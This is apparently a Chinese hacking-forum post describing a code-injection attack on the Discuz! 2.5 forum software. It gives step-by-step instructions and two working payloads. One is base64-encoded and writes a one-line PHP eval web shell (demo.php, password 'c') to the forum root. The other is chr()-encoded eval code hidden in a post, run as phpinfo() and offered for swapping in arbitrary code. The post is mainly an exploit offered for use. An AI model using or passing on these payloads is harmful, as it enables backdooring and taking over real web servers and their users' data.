直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。

1.注册任意账户

2.登陆用户，发表blog日志（注意是日志）

3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志，论坛根目录下生成demo.php，一句话密码C

这个必须是要开启seo

在这个地方。二个的都是这个地方。

最新更新的是能直接在贴子里面拿shell。。

利用方式也并非非得发blog，也不是非得发网络图片，详细的利用我是比如随便发个贴子，内容

${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}

然后给他加上任意超链接，发布即可phpinfo()，

这个自己换成char就可以了

自己敢兴趣的怎么网上搜。好多的。